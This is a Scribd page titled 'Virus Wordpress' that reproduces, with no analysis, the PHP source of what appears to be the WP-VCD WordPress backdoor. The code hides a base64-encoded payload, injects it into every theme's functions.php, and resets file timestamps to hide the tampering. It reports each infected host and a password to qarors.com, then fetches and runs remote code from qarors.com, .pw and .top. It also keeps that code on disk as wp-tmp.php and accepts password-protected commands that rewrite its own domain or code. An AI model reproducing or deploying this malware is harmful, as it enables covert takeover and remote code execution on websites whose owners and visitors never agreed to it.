Scribd Logo
Upload

Welcome to Scribd!

  • 14 views

    Virus Wordpress

    Uploaded by

    Cristian Vega
    This document contains PHP code for installing or modifying code on a website. The code allows changing the domain or code by passing parameters in the request. It downloads code from an external site, checks for a hardcoded authorization key, and if present, executes the code to modify the local files.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    Virus Wordpress

    Uploaded by

    Cristian Vega
    14 views11 pages
    This document contains PHP code for installing or modifying code on a website. The code allows changing the domain or code by passing parameters in the request. It downloads code from an external site, checks for a hardcoded authorization key, and if present, executes the code to modify the local files.

    Original Description:

    VIRUS

    Original Title

    virus wordpress

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document contains PHP code for installing or modifying code on a website. The code allows changing the domain or code by passing parameters in the request. It downloads code from an external site, checks for a hardcoded authorization key, and if present, executes the code to modify the local files.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    14 views11 pages

    Virus Wordpress

    Uploaded by

    Cristian Vega
    This document contains PHP code for installing or modifying code on a website. The code allows changing the domain or code by passing parameters in the request. It downloads code from an external site, checks for a hardcoded authorization key, and if present, executes the code to modify the local files.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    of 11

    <?

    php
    error_reporting(0);
    //KGlzc2V0KCRfUkVRVUVTVFs
    ini_set('display_errors', 0);
    //VTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQ

    $install_code =
    'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUk
    VRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAne
    yRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoIC
    gkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdl
    X2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJ
    CQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb
    21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
    ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBA
    ZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgI
    CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgIC
    AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
    gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGw
    oJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiop
    XC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgIC
    AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
    gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAg
    ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
    AgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5b
    MV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgIC
    AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
    gICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJC
    QkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgI
    CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
    AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQ
    kgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
    gICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQ
    kJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3
    Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVT
    VFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA
    gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZ
    SA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgIC
    AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICA
    gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
    CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2Fs
    bCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90
    aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICA
    gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
    CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgI
    CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
    AgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cml
    wc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgIC
    AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
    gICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJC
    QkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICA
    gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
    CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgI
    CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
    AgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZ
    mF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KC
    QkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwok
    ZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV9
    0ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4
    gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ
    1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9T
    RVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgI
    CAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogI
    CAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1c
    mxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgI
    CAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgIC
    BjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAg
    ICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICA
    gY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKI
    CAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF
    9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgI
    CAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICA
    gICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9
    kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm
    9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsI
    CI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJ
    HRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgI
    CAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJG
    hhbmRsZSwgIjw/
    cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgI
    CAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hb
    WUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH
    0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nZWIzYzIxMTgzNTk4MjZjMzBjMzI0NzUzMTk4O
    WY5YzYnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudH
    MoImh0dHA6Ly93d3cucWFyb3JzLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQ
    GZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3LnFhcm9ycy5jb20vY29kZS5w
    aHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNl
    KSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2
    V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9z
    ZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlb
    nRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KT
    sKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhB
    QlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgIC
    AgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL
    3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKC
    FmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHA
    nKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwL
    XRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICA
    gICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgI
    CAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2
    dldF9jb250ZW50cygiaHR0cDovL3d3dy5xYXJvcnMucHcvY29kZS5waHAiKSAgQU5EIHN0c
    mlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0
    cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgI
    CAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgIC
    AgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVz
    L3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgIC
    AgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10
    bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2
    V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQp
    OwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2Rp
    cmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAg
    QGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgI
    CAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogIC
    AgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbn
    QgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cucWFyb3JzLnRvcC9jb2RlLnBo
    cCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc
    2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZ
    mFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1
    wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1B
    BVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgIC
    AgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4g
    J3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBma
    WxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5w
    aHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4
    aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogIC
    AgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAn
    LCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICA
    gfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICg
    kdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1Z
    GVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhf
    a2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3Nld
    HVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXB
    jb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoK
    SAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF
    9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V
    0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9I
    EBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb25
    0ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0
    KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICA
    gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0
    X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4=';

    $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);


    $install_code = str_replace('{$PASSWORD}' , $install_hash,
    base64_decode( $install_code ));

    $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' .


    DIRECTORY_SEPARATOR . 'themes';

    $ping = true;
    $ping2 = false;
    if ($list = scandir( $themes ))
    {
    foreach ($list as $_)
    {

    if (file_exists($themes .
    DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
    {
    $time = filectime($themes
    . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

    if ($content =
    file_get_contents($themes . DIRECTORY_SEPARATOR . $_ .
    DIRECTORY_SEPARATOR . 'functions.php'))
    {
    if
    (strpos($content, 'WP_V_CD') === false)
    {

    $content = $install_code . $content ;

    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ .
    DIRECTORY_SEPARATOR . 'functions.php', $content);

    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR .


    'functions.php' , $time );
    }
    else
    {

    $ping = false;
    }
    }

    else
    {
    $list2 = scandir( $themes .
    DIRECTORY_SEPARATOR . $_);
    foreach ($list2 as $_2)
    {

    if (file_exists($themes .
    DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 .
    DIRECTORY_SEPARATOR . 'functions.php'))
    {
    $time = filectime($themes
    . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 .
    DIRECTORY_SEPARATOR . 'functions.php');

    if ($content =
    file_get_contents($themes . DIRECTORY_SEPARATOR . $_ .
    DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
    {
    if
    (strpos($content, 'WP_V_CD') === false)
    {

    $content = $install_code . $content ;

    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ .
    DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);

    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR .


    $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );

    $ping2 = true;
    }

    else
    {

    //$ping = false;
    }
    }

    }
    }

    if ($ping) {
    $content =
    @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] .
    '&password=' . $install_hash);
    //@file_put_contents(ABSPATH . '/wp-
    includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));
    }

    if ($ping2) {
    $content =
    @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] .
    '&password=' . $install_hash);
    //@file_put_contents(ABSPATH .
    'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));
    //echo ABSPATH . 'wp-includes/class.wp.php';
    }

    ?><?php error_reporting(0);?>

    theme

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) &&
    ($_REQUEST['password'] == '0db04b1ec40d07cfdd0e077af47afd0a'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {

    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {

    if (!empty($_REQUEST['newdomain']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\
    $tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    {

    $file = preg_replace('/'.
    $matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);

    @file_put_contents(__FILE__, $file);
    print
    "true";
    }

    }
    }
    }
    break;

    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {

    if (!empty($_REQUEST['newcode']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\/\/\
    $start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
    {
    $file =
    str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);

    @file_put_contents(__FILE__, $file);
    print
    "true";
    }

    }
    }
    }
    break;

    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";


    }

    die("");
    }

    $div_code_name = "wp_vcd";
    $funcfile = __FILE__;
    if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false &&
    stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

    function file_get_contents_tcurl($url)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }

    function theme_temp_setup($phpCode)
    {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    if( fwrite($handle, "<?php\n" . $phpCode))
    {
    }
    else
    {
    $tmpfname = tempnam('./', "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    }
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    $wp_auth_key='eb3c2118359826c30c3247531989f9c6';
    if (($tmpcontent = @file_get_contents("http://www.qarors.com/code.php") OR
    $tmpcontent = @file_get_contents_tcurl("http://www.qarors.com/code.php")) AND
    stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {


    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents("http://www.qarors.pw/code.php") AND


    stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {


    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent =
    @file_get_contents("http://www.qarors.top/code.php") AND stripos($tmpcontent,
    $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {


    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-
    tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php')


    AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent,


    $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    }
    }

    //$start_wp_theme_tmp
    //wp_tmp

    //$end_wp_theme_tmp
    ?>

    You might also like